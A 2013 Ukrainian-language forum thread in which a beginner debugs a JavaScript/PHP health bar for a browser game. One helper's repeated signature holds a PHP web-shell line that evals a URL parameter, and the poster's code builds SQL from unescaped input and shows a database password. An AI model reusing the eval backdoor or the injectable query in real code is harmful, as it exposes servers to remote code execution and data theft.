1 Востаннє редагувалося Faraon (05.07.2013 21:39:26)

Тема: Уроки blitz-school

Хто чув про уроки  blitz-school ?
Це уроки по створеню браузерної ігри, в програмувані я не дуже томі і пілглядаю по цих уроках)
Ось мені потрібно було зробити життя персонажа.
blitz-school - урок 3, там про це написано. Но в мене чомусь не працює!
Ось уривок коду який відовідає за життя:

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>

  
  <SCRIPT>
 var delay = 2; // задержка изменения очков здоровья
var redHP = 0.33; // меньше 30% красный цвет
var yellowHP = 0.66; // меньше 60% желтый цвет, иначе зеленый
var TimerOn = -1; // id таймера
var tkHP, maxHP;
 var speed=100;
 var mspeed=100;


//-- Смена хитпоинтов (очков здоровья) со временем
function setHP(value, max, newspeed) {
 tkHP=value; maxHP=max;
 if (TimerOn>=0) {  clearTimeout(TimerOn); TimerOn=-1; }
 speed=newspeed;
 setHPlocal();
 }

function setHPlocal() {
 if (tkHP>maxHP) { tkHP=maxHP; }
 var sz1 = Math.round((149/maxHP)*tkHP);
 var sz2 = 150 - sz1;
 if (document.all("HP")) {
 document.HP1.width=sz1;
 document.HP2.width=sz2;
 if (tkHP/maxHP < redHP) { document.HP1.src='items/1red.gif'; }
 else {
 if (tkHP/maxHP < yellowHP) { document.HP1.src='items/1yellow.gif'; }
 else { document.HP1.src='items/1green.gif'; }
 }
 var s = document.all("HP").innerHTML;
 document.all("HP").innerHTML = s.substring(0, s.lastIndexOf(':')+1) + Math.round(tkHP)+"/"+maxHP;
 }
 tkHP = (tkHP+(maxHP/100)*speed/1000);
 if (tkHP<maxHP) { TimerOn=setTimeout('setHPlocal()', delay*100); }
 else { TimerOn=-1; 
 }
 }

 </SCRIPT>
<body bgcolor="#BFBFBF" onLoad="setHP(<?php  echo $Character_CurHealth; ?>,<?php  echo $aEndurance*6 ?>,100)">
/* полоса уровня життя*/
<td width="238">
 <table cellspacing=0 cellpadding=0 border="0" bordercolor="#000080"><tr><td>
 <NOBR><div id=HP>
 <IMG SRC="items/herz.gif" ALT="Уровень жизни"> <IMG SRC=1silver.gif WIDTH=1 HEIGHT=10 ALT="Уровень жизни" name=HP1><IMG SRC=1silver.gif WIDTH=1 HEIGHT=10 ALT="Уровень жизни" name=HP2>:</div>
 </nobr>
 </table>

А також можливо я десь в іншому місці припкстився помилки тому вмставляю код цілого файлу

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title><<<Акаунт>>></title>
  <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" />
  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>

  
  <SCRIPT>
 var delay = 2; // задержка изменения очков здоровья
var redHP = 0.33; // меньше 30% красный цвет
var yellowHP = 0.66; // меньше 60% желтый цвет, иначе зеленый
var TimerOn = -1; // id таймера
var tkHP, maxHP;
 var speed=100;
 var mspeed=100;


//-- Смена хитпоинтов (очков здоровья) со временем
function setHP(value, max, newspeed) {
 tkHP=value; maxHP=max;
 if (TimerOn>=0) {  clearTimeout(TimerOn); TimerOn=-1; }
 speed=newspeed;
 setHPlocal();
 }

function setHPlocal() {
 if (tkHP>maxHP) { tkHP=maxHP; }
 var sz1 = Math.round((149/maxHP)*tkHP);
 var sz2 = 150 - sz1;
 if (document.all("HP")) {
 document.HP1.width=sz1;
 document.HP2.width=sz2;
 if (tkHP/maxHP < redHP) { document.HP1.src='items/1red.gif'; }
 else {
 if (tkHP/maxHP < yellowHP) { document.HP1.src='items/1yellow.gif'; }
 else { document.HP1.src='items/1green.gif'; }
 }
 var s = document.all("HP").innerHTML;
 document.all("HP").innerHTML = s.substring(0, s.lastIndexOf(':')+1) + Math.round(tkHP)+"/"+maxHP;
 }
 tkHP = (tkHP+(maxHP/100)*speed/1000);
 if (tkHP<maxHP) { TimerOn=setTimeout('setHPlocal()', delay*100); }
 else { TimerOn=-1; 
 }
 }

 </SCRIPT>

  </head>
<body bgcolor="#BFBFBF" onLoad="setHP(<?php  echo $Character_CurHealth; ?>,<?php  echo $aEndurance*6 ?>,100)">
  <?php
session_start();

if(!isset($_SESSION['login']) )
    header('Location: index.php'); # Перенаправте юзера на логін-сторінку
    
echo '<center> Добро пожаловать '.$_SESSION['login'].'.</center>';
if(isset($_POST['logout'])) {
  unset( $_SESSION['login']);
  unset( $_SESSION['password']);

 }
 
$_GET['NickName'] = $_SESSION['login'];

?>
  

<!--- витягуємо з бази поля з характеристиками пользователя і призначаємо їм переміні ---->
<?php
if (!empty($_GET['NickName'])){
$aNickName = $_GET['NickName'];

$aWhatStat = "";
$aWhatSkill = "";

$mysql_host = "localhost";
$mysql_user = "root";
$mysql_password = "Naruto1996";
$my_database = "legion";

$link = mysql_connect($mysql_host, $mysql_user, $mysql_password)
or die("Could not connect : " . mysql_error());
mysql_select_db($my_database) or die("Could not select database");

// Узнаем характеристики персонажа
$query = "SELECT * FROM users WHERE login='$aNickName'";
$result = mysql_query($query) or die("Query failed : " . mysql_error());
$aRow = mysql_fetch_array( $result);

$aStrength = $aRow["Character_Strength"]; //сила персонажа
$aEndurance = $aRow["Character_Endurance"]; //Выносливость
$aAccuracy = $aRow["Character_Accuracy"]; //Точность перса (влияет на крит.удар)
$aDexterity = $aRow["Character_Dexterity"]; //Ловкость перса (влияет на уворот)
$aCharLevel = $aRow["Character_Level"]; // уровень
$aMoney = $aRow["Character_Money"]; //денги
$aEuro = $aRow["Character_Euro"];  // золоті монети
$aExperience = $aRow["Character_Experience"]; //опыт
$ateder = $aRow["Character_teder"]; //ничьих
$ano_teder = $aRow["Character_no_teder"]; //поражений
$ayes_teder = $aRow["Character_yes_teder"]; //побед
$aCharacter_CurHealth = $aRow["Character_CurHealth"]; /*тек здоровье во время боя*/
$asex = $aRow["sex"]; //стать
$ainf = $aRow["inf"]; //информация


mysql_free_result($result);
}
?>
<center>

      <a href="game.php?go=map" target="_blank" class="here">Играть</a>
     <a href="#" >Инвентарь</a>
      <a href="#" >Игроки</a>
     <a href="#" >Магазин</a>
     <a href="prof.php" >Настройки</a>
     <a href="index.php" >Главная</a>


    


    <table border="2">
    <tr>
  <td border="2">
    <!-- Тут рoзміщена таблиця здоровя персонажа -->
<td width="238">
 <table cellspacing=0 cellpadding=0 border="0" bordercolor="#000080"><tr><td>
 <NOBR><div id=HP>
 <IMG SRC="items/herz.gif" ALT="Уровень жизни"> <IMG SRC=1silver.gif WIDTH=1 HEIGHT=10 ALT="Уровень жизни" name=HP1><IMG SRC=1silver.gif WIDTH=1 HEIGHT=10 ALT="Уровень жизни" name=HP2>:</div>
 </nobr>
 </table>

    </td>
    </tr>
<tr>
  <td><img src="images\avatar/<?php echo $asex;?>.png"></td>
  <td>
Сила: <?php echo "$aStrength"; ?><br>
Ловкость: <?php echo "$aDexterity"; ?><br>
Точность: <?php echo "$aAccuracy"; ?><br>
Выносливость: <?php echo "$aEndurance"; ?><br>  
<HR>
Опыт: <?php echo "$aExperience"; ?> <br>
Уровень: <?php echo "$aCharLevel"; ?><br>
Побед: <?php echo "$ayes_teder"; ?> <br>
Поражений: <?php echo "$ano_teder"; ?><br>
Ничьих: <?php echo "$ateder"; ?><br>
<HR>
Деньги: </font><b><font color="#FF0000"><?php echo "$aMoney"; ?> </font></b> <font color="#000080">монет<br>
Золотих: </font><b><font color="#FF0000"><?php echo "$aEuro"; ?> </font></b> <font color="#000080">монет<br>

</td>
</tr>
    </table>
    
</center>

</body>
</html>

Хто буде мати багато вільного часу допоможіть мені буль-ласка, )
Також я скопіював урок blitz-school на створення полоси життя

Прихований текст
Еще мы намеревались сделать полоску жизни нашего героя, которая должна выглядеть примерно так:

Когда у героя мало здоровья ( например 2 из 18) полоска должна быть красной, если в районе половины (т.е. порядка 11/18, как на рисунке) - полоска будет у нас желтой, если здоровье почти восстановилось - полоска становится зеленой.
     Чтоб реализовать полоску, которая будет стремиться к полному здоровью персонажа и еще и менять цвет, простым HTML кодом не отделаешься и нам придется воспользоваться языком JavaScript. Полоска реализуется также при помощи HTML таблиц и картинок соответствующих цветов:

<!-- Тут размещено здоровье персонажа -->
<td width="238">
<table cellspacing=0 cellpadding=0 border="0" bordercolor="#000080"><tr><td>
<NOBR><div id=HP>
<IMG SRC="items/herz.gif" ALT="Уровень жизни"> <IMG SRC=1silver.gif WIDTH=1 HEIGHT=10 ALT="Уровень жизни" name=HP1><IMG SRC=1silver.gif WIDTH=1 HEIGHT=10 ALT="Уровень жизни" name=HP2>:</div>
</nobr>
</table>
<!-- Конец Секции-->

Теперь приведем функции на JavaScript, которые будут реализовывать отображение здоровья персонажа, если текущие очки жизни его отличаются от максимальных (т.е к примеру 11/18)

<SCRIPT>
var delay = 2; // задержка изменения очков здоровья
var redHP = 0.33; // меньше 30% красный цвет
var yellowHP = 0.66; // меньше 60% желтый цвет, иначе зеленый
var TimerOn = -1; // id таймера
var tkHP, maxHP;
var speed=100;
var mspeed=100;


//-- Смена хитпоинтов (очков здоровья) со временем
function setHP(value, max, newspeed) {
tkHP=value; maxHP=max;
if (TimerOn>=0) {  clearTimeout(TimerOn); TimerOn=-1; }
speed=newspeed;
setHPlocal();
}

function setHPlocal() {
if (tkHP>maxHP) { tkHP=maxHP; }
var sz1 = Math.round((149/maxHP)*tkHP);
var sz2 = 150 - sz1;
if (document.all("HP")) {
document.HP1.width=sz1;
document.HP2.width=sz2;
if (tkHP/maxHP < redHP) { document.HP1.src='items/1red.gif'; }
else {
if (tkHP/maxHP < yellowHP) { document.HP1.src='items/1yellow.gif'; }
else { document.HP1.src='items/1green.gif'; }
}
var s = document.all("HP").innerHTML;
document.all("HP").innerHTML = s.substring(0, s.lastIndexOf(':')+1) + Math.round(tkHP)+"/"+maxHP;
}
tkHP = (tkHP+(maxHP/100)*speed/1000);
if (tkHP<maxHP) { TimerOn=setTimeout('setHPlocal()', delay*100); }
else { TimerOn=-1;
}
}

</SCRIPT>
   

    Первый вызов функции  мы должны сделать в теге <body> нашей веб-странички в событии onLoad. А дальше все уже будет работать автоматически под управлением таймера (как вы знаете в  JavaScript функции таймера это -  setTimeout и clearTimeout)
      Работает все это предельно просто, несмотря на кажущийся громоздкий код. Наши JavaScript функции (setHP и setHPlocal) должны знать сколько текущих очков здоровья у нашего героя (tkHP) и их максимальное количество (maxHP). и вычислить размер полоски по ширине для отображения текущего здоровья. Полная полоска у нас задана размеров 150 пикселей. Значит по пропорции (var sz1 = Math.round((149/maxHP)*tkHP);) - определит нам размер текущей полоски здоровья и (var sz2 = 150 - sz1;) - это оставшаяся до максимального значения здоровья полоска. HP1 и HP2 - как вы догадались это имена наших картинок, чей размер мы изменяем (document.HP1.width=sz1; и    document.HP2.width=sz2;) по событию таймера. В результате визуально получается эффект ползущей вправо полоски "заживления" нашего героя.
     Кроме полоски мы еще пишем через "слэш" текущее и полное здоровье персонажа цифрами: (document.all("HP").innerHTML = s.substring(0, s.lastIndexOf(':')+1) + Math.round(tkHP)+"/"+maxHP;)
      Остается вопрос, как же нашей функции на  JavaScript, которая работает на стороне браузера на клиентской машине игрока, узнать  - сколько здоровья у персонажа, которое хранится в поле Character_CurHealth в нашей таблице  users в базе данных mmclub на стороне сервера? А очень просто - мы передаем ее во встроенном куске кода на PHP, предварительно прочитав  и все другие необходимые параметры игрока для отображения на странице char.phtml.

<?php
if (!empty($_GET['NickName'])){
$aNickName = $_GET['NickName'];

$aWhatStat = "";
$aWhatSkill = "";
// Узнаем характеристики персонажа

$mysql_host = "localhost";
$mysql_user = "root";
$mysql_password = "";
$my_database = "mmclub";

$link =  mysql_connect($mysql_host, $mysql_user, $mysql_password)
or die("Could not connect : " .  mysql_error());
mysql_select_db($my_database) or die("Could not select database");

$query = "SELECT * FROM users WHERE Nick_Name='$aNickName'";
$result =  mysql_query($query) or die("Query failed : " .  mysql_error());
$aRow =  mysql_fetch_array( $result);

$aStrength = $aRow["Character_Strength"];
$aEndurance = $aRow["Character_Endurance"];
$aAccuracy = $aRow["Character_Accuracy"];
$aDexterity = $aRow["Character_Dexterity"];
$aNotUsedStats = $aRow["Character_UnUsed_Points"];
$aSwordSkill = $aRow["Character_Sword"];
$aSpearSkill = $aRow["Character_Spear"];
$aMaceSkill = $aRow["Character_Mace"];
$aAxeSkill = $aRow["Character_Axe"];
$aDaggerSkill = $aRow["Character_Dagger"];
$aCharLevel = $aRow["Character_Level"];
$aMoney = $aRow["Character_Money"];
mysql_free_result($result);
}
?>

Теперь осталось только подставить инициализированные переменные в нужное место в именно в  вызов функции   setHP  в теге <body> события  onLoad:

<body bgcolor="#BFBFBF" onLoad="setHP(<?php  echo $Character_CurHealth; ?>,<?php  echo $aEndurance*6 ?>,100)">

Естественно так будет тег <body> на стороне сервера а на стороне клиента уже будут подставлены соответствующие значения переменных и этот тег будет выглядеть так: 

<body bgcolor="#BFBFBF" onLoad="setHP(0,18,100)">

$aEndurance*6 - означает, что полное здоровье нашего героя вычисляется по формуле выносливость умножить на шесть.

2

Re: Уроки blitz-school

ці уроки вже не актуальні, так як подібні браузерки популярністю вже не користуються

3

Re: Уроки blitz-school

dmftaras написав:

ці уроки вже не актуальні, так як подібні браузерки популярністю вже не користуються

Так, не сперечаюся! Але я зараз не роблю браузерку по цих уроках, я просто роблю дитя персонажу яке є в кожній браузерці!
А що Ви маєте наувазі

ці уроки вже не актуальні, так як подібні браузерки популярністю вже не користуються

Ви маєте наувазі що інтерфейс по цих уроках застарілий? Чи сам код фігня?
А що Ви скажете нащот моєї проблеми?

4

Re: Уроки blitz-school

Ну по перше, якщо ви вже підключаєте jquery то використовуйте її, тоді ваш код стане вдвічі коротшим.
А по друге, як ви хочете отримати допомогу, якщо не вказали, що саме у вас не працює?

5

Re: Уроки blitz-school

(
Справді, я нічого не вказав)
Справа в тому що в мене не вибиває життя персонажа, зявилася одно тоненька полоска життя і все, більше нічого, вона малаб набиратися поки не заповниться! А якщо я не помиляюся а я не помиляюся, то має бути заповнений весь рядок який  я назначив!

6

Re: Уроки blitz-school

А я щось не то підключив?

7 Востаннє редагувалося Invader (08.07.2013 01:24:11)

Re: Уроки blitz-school

А я щось не то підключив?

Підключили

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>

але не видно щоб її використовували. Ви не користуєтеся функціями бібліотеки.

А помилки/повідомлення в консолі броузера в лоґ-файлі?

Здається до редагування ваше 1-е повідомлення таки містило опис проблеми.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

8

Re: Уроки blitz-school

Зрозуміло! Що мені потрібно підключити? Що саме я використовую?

9

Re: Уроки blitz-school

onLoad="setHP(<?php  echo $Character_CurHealth; ?>,<?php  echo $aEndurance*6 /*відсутній знак ";" */?>,100)">
<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!
Подякували: Faraon1

10

Re: Уроки blitz-school

Зрозуміло! Що мені потрібно підключити? Що саме я використовую?

Бібліотека вже піключена! Викор. (пишите) чистий JavaScript без використання функцій бібліотеки jQuery.
Вам треба було в рядку пошуку написати jQuery, натиснути Enter, і щось почитати.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!
Подякували: Faraon1

11 Востаннє редагувалося Invader (08.07.2013 02:13:18)

Re: Уроки blitz-school

jQuery для начинающих
Іще: у вас не дійсний документ. Варто почитати про DOCTYPE. Зачем нужен  Дещо про відмінності DOCTYPE в HTML5

Варто вам почати з чогось простішого і фундаментальнішого.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!
Подякували: Faraon1

12 Востаннє редагувалося Faraon (08.07.2013 02:29:35)

Re: Уроки blitz-school

Дякую.
Все одно не працює! Нічого не змінилося!
Вмправив код:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

  <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" />
  <link rel="stylesheet" href="css/akk.css" type="text/css">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>

  
<script type="text/javascript">
 var delay = 2; // задержка изменения очков здоровья
var redHP = 0.33; // меньше 30% красный цвет
var yellowHP = 0.66; // меньше 60% желтый цвет, иначе зеленый
var TimerOn = -1; // id таймера
var tkHP, maxHP;
 var speed=100;
 var mspeed=100;


//-- Смена хитпоинтов (очков здоровья) со временем
function setHP(value, max, newspeed) {
 tkHP=value; maxHP=max;
 if (TimerOn>=0) {  clearTimeout(TimerOn); TimerOn=-1; }
 speed=newspeed;
 setHPlocal();
 }

function setHPlocal() {
 if (tkHP>maxHP) { tkHP=maxHP; }
 var sz1 = Math.round((149/maxHP)*tkHP);
 var sz2 = 150 - sz1;
 if (document.all("HP")) {
 document.HP1.width=sz1;
 document.HP2.width=sz2;
 if (tkHP/maxHP < redHP) { document.HP1.src='items/1red.gif'; }
 else {
 if (tkHP/maxHP < yellowHP) { document.HP1.src='items/1yellow.gif'; }
 else { document.HP1.src='items/1green.gif'; }
 }
 var s = document.all("HP").innerHTML;
 document.all("HP").innerHTML = s.substring(0, s.lastIndexOf(':')+1) + Math.round(tkHP)+"/"+maxHP;
 }
 tkHP = (tkHP+(maxHP/100)*speed/1000);
 if (tkHP<maxHP) { TimerOn=setTimeout('setHPlocal()', delay*100); }
 else { TimerOn=-1; 
 }
 }

</script>

  </head>
<body bgcolor="#BFBFBF" onLoad="setHP(<?php  echo $aCharacter_CurHealth; ?>,<?php  echo $aEndurance*6; ?>,100)">
  <?php
session_start();

if(!isset($_SESSION['login']) )
    header('Location: index.php'); # Перенаправте юзера на логін-сторінку
    
echo '<center> Добро пожаловать '.$_SESSION['login'].'.</center>';
if(isset($_POST['logout'])) {
  unset( $_SESSION['login']);
  unset( $_SESSION['password']);

 }
 
$_GET['NickName'] = $_SESSION['login'];

?>
  

<!--- витягуємо з бази поля з характеристиками пользователя і призначаємо їм переміні ---->
<?php
if (!empty($_GET['NickName'])){
$aNickName = $_GET['NickName'];

$aWhatStat = "";
$aWhatSkill = "";

$mysql_host = "localhost";
$mysql_user = "root";
$mysql_password = "";
$my_database = "test";

$link = mysql_connect($mysql_host, $mysql_user, $mysql_password)
or die("Could not connect : " . mysql_error());
mysql_select_db($my_database) or die("Could not select database");

// Узнаем характеристики персонажа
$query = "SELECT * FROM users WHERE login='$aNickName'";
$result = mysql_query($query) or die("Query failed : " . mysql_error());
$aRow = mysql_fetch_array( $result);

$aStrength = $aRow["Character_Strength"]; //сила персонажа
$aEndurance = $aRow["Character_Endurance"]; //Выносливость
$aAccuracy = $aRow["Character_Accuracy"]; //Точность перса (влияет на крит.удар)
$aDexterity = $aRow["Character_Dexterity"]; //Ловкость перса (влияет на уворот)
$aCharLevel = $aRow["Character_Level"]; // уровень
$aMoney = $aRow["Character_Money"]; //денги
$aEuro = $aRow["Character_Euro"];  // золоті монети
$aExperience = $aRow["Character_Experience"]; //опыт
$ateder = $aRow["Character_teder"]; //ничьих
$ano_teder = $aRow["Character_no_teder"]; //поражений
$ayes_teder = $aRow["Character_yes_teder"]; //побед
$aCharacter_CurHealth = $aRow["Character_CurHealth"]; /*тек здоровье во время боя*/
$asex = $aRow["sex"]; //стать
$ainf = $aRow["inf"]; //информация
$aEV = $aRow["EV"]; //очки EV


mysql_free_result($result);
}
?>
<center>

      <a href="game.php?go=map" target="_blank" class="here">Играть</a>
     <a href="#" >Инвентарь</a>
      <a href="#" >Игроки</a>
     <a href="#" >Магазин</a>
     <a href="prof.php" >Настройки</a>
     <a href="index.php" >Главная</a>


    


    <table border="2">
    <tr>
  <td border="2">
  <?php echo "$aCharLevel"; ?>-lvl
      </td>
  
    <!-- Тут рoзміщена таблиця здоровя персонажа -->
       <tr>
  <td width="238">
 <NOBR><div id=HP>
 <IMG SRC="items/herz.gif" ALT="Уровень жизни"> <IMG SRC=1silver.gif WIDTH=1 HEIGHT=10 ALT="Уровень жизни" name=HP1><IMG SRC=1silver.gif WIDTH=1 HEIGHT=10 ALT="Уровень жизни" name=HP2>:</div>
 </nobr>
 </td>
</tr>
<!-- Конец Секции-->

    </tr>
<tr>
  <td><img src="images\avatar/<?php echo $asex;?>.png"></td>
  <td>
Сила: <?php echo "$aStrength"; ?><br>
Ловкость: <?php echo "$aDexterity"; ?><br>
Точность: <?php echo "$aAccuracy"; ?><br>
Выносливость: <?php echo "$aEndurance"; ?><br>  
Очки EV: <?php echo "$aEV"; ?><br>  
<HR>
Опыт: <?php echo "$aExperience"; ?> <br>
Побед: <?php echo "$ayes_teder"; ?> <br>
Поражений: <?php echo "$ano_teder"; ?><br>
Ничьих: <?php echo "$ateder"; ?><br>
<HR>
Деньги: </font><b><font color="#FF0000"><?php echo "$aMoney"; ?> </font></b> <font color="#000080">монет<br>
Золотих: </font><b><font color="#FF0000"><?php echo "$aEuro"; ?> </font></b> <font color="#000080">монет<br>

</td>
</tr>
    </table>
    
</center>
</body>
</html>

13

Re: Уроки blitz-school

В  тегу body
потрібно напевне писати

<?php  echo $aCharacter_CurHealth; ?> 

а не

<?php  echo $Character_CurHealth; ?>

так як з бази я виношу дані в змінну $aCharacter_CurHealth
Хоча все одно не допомагає!

14

Re: Уроки blitz-school

В мене виходить ось так
http://floomby.ru/s1/kYUxQY
а має бути ось так
http://floomby.ru/s1/GYUxQm

15

Re: Уроки blitz-school

Я так і не зрозумів на що там дивитися. Якісь скріншоти знизу і напис Для увеличения нажмите на изображение.
Користуйтесь краще цим або цим

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

16

Re: Уроки blitz-school

У мене зараз є ось так
http://osidok.pp.ua/images/2013/07/07/1.jpg
а має бути ось так
http://osidok.pp.ua/images/2013/07/07/2.jpg
так написано в уроках!

17

Re: Уроки blitz-school

Скопіював код з 1-го літиснгу 1-го повідомлення, зберіг, створив файли з іменами 1read.gif, 1green.gif, 1yellow.gif. Відкрив в Firefox і отримав

Timestamp: 08.07.13 03:42:56
Error: TypeError: document.all is not a function
Source File: file:///home/zaza/tmp/t.html
Line: 31

Інчого не працює.
Відкрив в Opera. Помилок немає. Життя набирається.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

18

Re: Уроки blitz-school

зараз скачаю оперу і попробую!

19

Re: Уроки blitz-school

В мене версія 12.15.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

20

Re: Уроки blitz-school

*SCRATCH*
дивно, в мене і на опері не працює!